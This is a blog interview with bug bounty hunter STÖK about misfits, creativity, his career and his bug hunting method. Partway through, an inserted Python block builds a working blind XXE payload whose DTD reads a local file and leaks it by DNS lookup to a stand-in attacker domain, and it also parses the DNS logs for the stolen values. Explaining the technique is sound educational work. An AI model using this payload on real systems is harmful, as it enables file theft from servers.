
SecurityTrails Blog · Apr 13 · by Sara Jelen

The Power of Being a Misfit: Speaking with Fredrik Alexandersson STÖK


Have you ever noticed some of the most creative thinkers and individuals seem to be misfits? There is power in being a misfit — being different, thinking creatively and outside the box, and rejecting established norms. Misfits are also frequently part of the counterculture.

Throughout history, many countercultures that challenged the status quo have bloomed. Each generation has found its own way to challenge authority and, from that, birth innovation. One modern counterculture is hackers. To find out more about the power of being a misfit across many different channels, not just hacking, we spoke with none other than Fredrik Alexandersson, whom you probably know as STÖK.

Whether it’s bug bounty hunting, content creation, skateboarding, or sustainable fashion, STÖK has always found counterculture to be his best friend for expressing his creativity. As a misfit himself, he is one of the loudest voices in the modern bug bounty hunting and hacker scene. His online presence and his selfless, distinctive way of sharing knowledge and experience, always focused on the right mindset, have made STÖK one of the biggest influencers and possibly the most well-known vlogger on the scene.

We joined STÖK in his hometown of Gothenburg, Sweden, and discussed the hidden power behind misfits, how it feels to be famous in such a non-mainstream space, the true meaning behind “hackers gonna hack, creators gonna create”, how he breaks barriers for newcomers entering cybersecurity, and whether anyone really can become a hacker with the right mindset.


SecurityTrails: Hacker culture and community have always appeared mysterious and secretive to the outside world. How does it feel to be so well-known, famous even, in such an unconventional space?

Fredrik Alexandersson STÖK: To be honest, it feels kind of weird but good at the same time. The influence I gained over the last 3 years has definitely resulted in doors opening to super fun projects and given me access to people I wouldn’t have had access to earlier, which is amazing. But I can’t stop being weirded out by people stopping me in the street asking for selfies; it’s just surreal.

ST: It seems counterculture has always attracted you. First with skateboarding, then hacking, and even sustainable fashion can be considered part of it. What drew you to these interests, and how would you say they are tied together?

STÖK: I am a creative soul, and I love to express my creativity. Heck, I need to express my creativity! Throughout my life, creativity has manifested itself in many shapes and forms. I’ve always felt more at home with the rebels, punks, outcasts, and misfits, the weird ones. Hackers are just as much the misfits as skateboarders, underground rave DJs, graffiti artists, writers, and designers. I guess, for me, the constant drive to change the status quo, not settling, always trying to learn something new, creating new ways, and experimenting drew me in. That’s what hacking is to me - questioning why things work in a certain way, trying to figure out what makes things tick, and creating something new out of that, plus always learning along the way. The same goes for skateboarding, writing music, creating art, or designing clothes.


ST: You talked about being someone who tends to get easily bored and can quit out of the blue to start something else. What keeps you focused and going with the things you have stuck with?

STÖK: YES! This definitely is my non-neurotypical brain talking, but I get bored when I feel like I have mastered something to a certain degree. For instance, take my passion for juggling.

While traveling through Europe with my parents, we ended up in some major city and stumbled upon a street performer. That person juggled a set of juggling balls with such grace and control, it simply blew my mind. I was mesmerized and had to give it a try! Eventually, I managed to get hold of a pair of tennis balls and started to practice. Later, a set of professional juggling balls replaced them, you know, the ones filled with sand, with different colors on the squares, that make a thump when you drop them. I carried that set of juggling balls with me EVERYWHERE and practiced daily for months and months, juggling anything I could get my hands on, improving and leveling up my juggling game.


One day, after I finally managed to throw a six-ball cascade while riding a unicycle (yeah, those were my circus days for sure), I put the bike in the closet, the balls in the box, and never picked them up again.

I was done.

By that stage, I had acquired a personal skill level of what I would define as 60% of what would be needed compared with mastery. Every increment in my skill set from there on would require a substantial amount of dedication. So I did what I always do and moved along and fell head over heels in love with something else.

But there is something special with computers and new technology. There is always room for improvement. I’ve been deep into computers for over 35 years, and there is always room to learn new things or a new skill. That’s why I love cybersecurity, you can’t master it, not even to 60%.

ST: “Hackers gonna hack, creators gonna create.” It’s refreshing to see someone actively live what they preach. How important is nurturing creativity through projects outside of cybersecurity, where the “you gotta live and breathe cybersec” narrative is sometimes pushed?

STÖK: It would be a lie if I said I don’t “live and breathe” cybersecurity in some shape or form. It is an industry where you kind of need to keep your ear against the rails. Incidents, network threats, and new research are happening all the time. It is absolutely a big part of my life and has been for years. But I decided a few years back I needed balance in my life. Nowadays, I try to only engage in cyber-related stuff 3-4 times/week, which is a challenge by itself — FOMO is definitely a thing. I make sure to relax, unwind, and let go of things, primarily to avoid burnout and not go insane.


ST: I can also see the other part of hackers gonna hack, creators gonna create. By creating and sharing everything you know, you are creating more hackers who hack and create! How important is collaboration and sharing knowledge, even in the competitive bug bounty world?

STÖK: I strongly believe in the core concepts of sharing is caring and giving back to the community where you learn your skills. Honestly, it’s way more fun to hack/skate/party/change the world together with other people. Collaboration and sharing knowledge have always felt more natural to me. Sure it can be a competitive space, but only if you make it so. The only real competition is you and the person you were yesterday.

ST: The positive attitude and mindset that exudes from your online presence are almost contagious. Many of the things you stand for break barriers for newcomers to the industry and stop the gatekeeping seen around cybersecurity. Do you think anyone can become a hacker with the right directive and help?

STÖK: First, thanks.

And yes, simply because being “a hacker” isn’t a title you earn, it’s not a certificate, it’s not a merit, or a title, it’s a mindset! And the second you decide to become a hacker, you are a hacker. It’s that simple.

I think anyone can learn anything they want with the right motivation, passion, interest, and drive. It might take time, patience, and dedication, but I think anyone can learn how to hack stuff. It’s far less cloak and dagger than people think.


ST: 2020 was a year where you quit your job to be a full-time bug bounty hunter and content creator. How do you reflect on that year now?

STÖK: When I quit my stable cybersecurity job to join the international Live Hacking circuit in November 2019, I didn’t expect the world to turn upside down by the beginning of May. Everything I had planned - 9+ Live Hacking events, speaking engagements, workshops, and conferences/meetups got shut down and canceled. To be fully transparent and honest, I was devastated. I felt like the rug was swept from beneath my feet, and I got very depressed.

Since I couldn’t travel for vlogging or speaking at cybersecurity conferences, and all my paid gigs were gone, I had to rethink my life, business, and content strategy. But by combining my cybersecurity advisory, YouTube channel, clothing brand, sponsors, and bug bounties, I managed to turn what started as a rather depressing beginning of 2020 into a successful end. At the beginning of 2021, when presented with the opportunity to work with many exceptional experts sharing even more cybersecurity awareness, helping breached organizations, and actively preventing new breaches as a part of the threat intelligence team at TRUESEC, it was a no-brainer.

ST: In your pre-bug-bounty career, you were working with infrastructure in Active Directory. Have you ever won a bounty thanks to that experience?

STÖK: Sure, Active Directory is a big part of the Microsoft universe. And any Windows box connected to a network that uses authentication is usually using some kind of AD connection. Third-party SSO integrations, admin panels, VPNs, Exchange, IIS servers, you name it, if it runs on Windows, it’s almost always AD related in some way. But the bugs in bounties rarely affect the AD itself, it’s mostly related to bugs inside the web apps that authenticate towards it. Red teaming on the other hand or internal pentesting, that’s a whole other story. And that’s really where my skills shine.


ST: What is the most creative attack you have successfully executed?

STÖK: I’ve executed many creative attacks, but one I can actually talk about is where I had a fully blind XXE in a file upload with no external egress traffic. Since I needed to host a DTD file to execute my payload, I uploaded and hosted a TXT file on another internal domain of the app. The domain was internally whitelisted, and I eventually managed to use that file for my SYSTEM HTTP request to exfiltrate the content of an LFI over DNS as the POC. It was a super lucky edge chase but definitely a creative workflow.

I love blind things, where you need to rely on time and response length.
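The blind XXE workflow STÖK describes above, generalized as an added example that is neither his actual payload nor code from the original article: a builder for the external DTD and the uploaded XML (the classic parameter-entity trick that turns a local file read into an outbound DNS lookup, so it works even when HTTP egress is blocked), a check on whether a leaked value can survive as a DNS label, and the DNS-side parsing that recovers leaked values from query-log lines. The attacker domain, the internal URL standing in for the allow-listed TXT file, the target file and the query-log lines are all constructed stand-ins, not identifiers from the interview.

```python
"""Generic blind (out-of-band) XXE payload builder and DNS-side decoder.

Added illustration; every hostname, URL and path below is hypothetical.
"""
import re

ATTACKER_DOMAIN = "exfil.attacker.example"            # hypothetical: domain whose authoritative DNS you run
DTD_URL = "http://assets.internal.example/notes.txt"  # hypothetical: "TXT" file hosted on an internal, allow-listed domain
TARGET_FILE = "file:///etc/hostname"                  # a one-line file; see dns_safe() for why that matters

# One DNS label: letters, digits and hyphens, at most 63 characters.
DNS_LABEL = re.compile(r"^[A-Za-z0-9-]{1,63}$")


def build_dtd(target_file=TARGET_FILE, attacker_domain=ATTACKER_DOMAIN):
    """The DTD the victim's parser fetches from DTD_URL.

    %file  -> contents of the local file (the LFI part).
    %eval  -> declares a second parameter entity whose SYSTEM identifier embeds
              %file as a hostname; &#x25; is '%' escaped so the inner declaration
              is only expanded when %eval; is referenced.
    %exfil -> resolving it forces a lookup of <file-content>.<attacker_domain>,
              which reaches your DNS server even without HTTP egress.
    """
    return (
        f'<!ENTITY % file SYSTEM "{target_file}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://%file;.{attacker_domain}/'\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_payload(dtd_url=DTD_URL):
    """The XML that gets uploaded. It only points at the external DTD; all the
    entity expansion above happens inside the vulnerable parser."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE data SYSTEM "{dtd_url}">\n'
        "<data/>\n"
    )


def dns_safe(value):
    """Raw XXE-over-DNS can only carry what fits in a single hostname label:
    no newlines, slashes, colons or spaces, and at most 63 characters.
    Multi-line files such as /etc/passwd will not resolve this way, which is
    why a short single-line file is the sensible first target."""
    return bool(DNS_LABEL.match(value))


def extract_from_qname(qname, attacker_domain=ATTACKER_DOMAIN):
    """On the authoritative DNS side: strip our suffix from a query name and
    return the leaked label, or None if the query is not for our domain.
    The suffix match is case-insensitive (DNS is), the leaked value is kept as seen."""
    qname = qname.rstrip(".")
    suffix = "." + attacker_domain
    if not qname.lower().endswith(suffix.lower()):
        return None
    return qname[: -len(suffix)]


# Constructed lines in a BIND-style query-log shape; not a real capture.
SAMPLE_QUERY_LOG = [
    "client 10.20.0.7#40211: query: web01-prod.exfil.attacker.example IN A +",
    "client 10.20.0.7#40211: query: www.example.org IN A +",
    "client 10.20.0.9#51002: query: WEB02-prod.exfil.attacker.example IN AAAA +",
    "client 10.20.0.9#51002: query: web01-prod.exfil.attacker.example IN A +",
]


def leaked_values(log_lines, attacker_domain=ATTACKER_DOMAIN):
    """Walk query-log lines and collect distinct leaked labels in first-seen order."""
    found = []
    for line in log_lines:
        m = re.search(r"query: (\S+) IN ", line)
        if not m:
            continue
        value = extract_from_qname(m.group(1), attacker_domain)
        if value is not None and value not in found:
            found.append(value)
    return found


if __name__ == "__main__":
    print(build_payload())
    print(build_dtd())
    print("leaked:", leaked_values(SAMPLE_QUERY_LOG))
```

The DTD has to be fetched by the parser, which is why the hosting location mattered in STÖK's case: with no external egress, the only place the parser could load it from was a domain the application already trusted. The DNS lookup for `%exfil;` is the one channel that does not depend on that trust, which is what makes it usable as a proof of concept.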

ST: You are one of the rare ones that went from the blue to the red team! Did offensive hacking help you be a better defender? What did that jump/transition look like for you?

STÖK: HAHA! And now I’m back at the blue side again! Or maybe more on the purple part of the spectrum. And yes, I think it really helps to have been working on the red side if you want to become good at defense. You need to know the workflows, frameworks, tools, and techniques commonly used by APTs and cybercriminals to protect against it. There is more “coolness” factor being on the offensive side. I mean, who doesn’t want to be a stealthy hacker, right?

But incident response during a live breach is red-teaming in reverse. It’s high pressure, adrenaline, and teamwork. You get thrown into a live breach, start to assess the situation, collect intel, run forensics, collect artifacts, and document and secure the environment. While also trying to stay under the radar, waiting for the right time, performing full password resets, and performing a total kick-out of the attacker. Plus, actively monitoring for any changes and making sure the TA doesn’t have any other persistence or access to the system. The forensics team works their way back to patient zero while the rebuild team starts rebuilding as soon as possible. There is no room for mistakes, and every minute counts. I thrive in those situations and love it!


ST: How much of your success as a bug bounty hunter would you attribute to your technical skills, and how much to having the right mindset? Work hard or work smart?

STÖK: I have been around computers all my life. My dad used to sell UNIX systems in the mid-80s, so I have always had access to technology. If we take that and the fact that I have worked inside the IT industry as a professional consultant for almost 2.5 decades, it would be ridiculous to say that my tech-savviness did not play into my success. It absolutely played a big role.

I had such rapid success in bounties because I have hacked stuff for most of my life. I just never saw it as hacking, I was a problem solver, a person that has a knack for finding anomalies. I just had to learn a new set of frameworks, tools, and languages. I attribute my creative brain to a lot of the bugs I find. I guess my brain doesn’t work as others do, and I don’t have a fixed methodology. I have a sense of when things are vulnerable. I know it sounds lame and all “hippie sh*t” but I rely heavily on instinct when I’m hacking.


ST: You once said bug bounty is a marathon, not a sprint. Can you elaborate more on that thought? What does preparation for the marathon look like to you?

STÖK: It’s all about persistence, endurance, and dedication.

Compare approaching a new target that you never hacked before with the epic battle of choosing a new series to watch on Netflix. I always check how many seasons there are and if it is binge-worthy. For me, 3-5 seasons is a good number to give it a go. That means the app is deep enough, has enough functionality, authentication levels, use cases, and is regularly updated.

The pilot:

This is when you sign up for the app with user1_ and start clicking around while logging everything in Burp to get a feel for what’s going on. If it is good, you stay and get ready to do some damage.

Season 1:

This is when you sign up with user2_ and test the signup flow, test for authentication bypasses, and start to walk the site with 2 users to check for IDORs. Testing functionality will help you understand what this application is all about. In short, this is when you start to understand what the show is about, get familiar with the characters and locations, and get comfortable with the cast.

Season 2:

Business as usual, but the story deepens. You get to know some side stories about the characters, maybe some new locations show up, and a new character gets added to the show. This is where you do some deeper content discovery, try to understand the developers’ ideas, identify and find some weird API endpoints, and maybe start pivoting over to the mobile app. Overall, you have a pretty good idea of what’s going on, and when the season finale hits, you’re excited. And can’t wait for season 3, which is the new feature the devs have talked about in the community forum.

Season 3:

Yes! Your show is back from summer break, and it’s time to reminisce with old friends. But hey, what is this?! They changed one of the actors! The character is the same, but it’s a totally different actor! Sure, they kind of look like the one you fell in love with, but it still feels off!

This is when you realize you went deep enough to find the really nice and interesting bugs because no one that started watching the show at season 3 would know, but you do! And this is where all the fun begins!

ST: You are from Sweden, which is already well known for its security and bug bounty community. What do you think is behind this, and why is Sweden such a fruitful space for hackers?

STÖK: I would attribute it to at least five reasons.

  1. It’s free to get an education in Sweden.
  2. Swedes don’t dub their TV shows, and a bunch of us grew up with US TV series, so most Swedes are fluent in English.
  3. Sweden got the internet at scale in the early 90s.
  4. Swedes social distance by nature.
  5. Sweden is cold, dark, and actually quite depressing for eight months of the year, so most Swedes stay inside, a perfect time to hack.

ST: What can we expect from STÖK in future? Are there any new channels of creativity you anticipate exploring?


STÖK: My creative outlet is constantly changing. Today it might be cybersecurity related content, YouTube, Instagram stories, TikTok, or Bounty Thursdays, and tomorrow it’s something else. One thing’s for sure: I will always create stuff. For now, YouTube feels like a good long-term format in an ephemeral landscape. I want to leave some stuff for the afterlife, document stuff, and share what I learn. And since I’m back on the blue side, I’m definitely going to create more defense/blue team related content as well for Truesec. Threat intelligence, incident response, and Active Defence are sexy, in my honest opinion. Who knows what tomorrow will bring. Whatever I do will be all about the good vibes!


Final words

We’re only two days away from the end of Bug Bounty Hunting Month, but we have finished it with a bang! We hope you’ve enjoyed this interview with none other than STÖK and that you have learned more about where he directs his creativity, how he chooses his outlets, and what we can expect in the future from one of the most influential bug bounty hunters in the space.


SARA JELEN

Sara believes the human element is often at the core of all cybersecurity issues. It’s this perspective that brings a refreshing voice to the SecurityTrails team. Her ability to bridge cognitive/social motivators and how they impact the cybersecurity industry is always enlightening.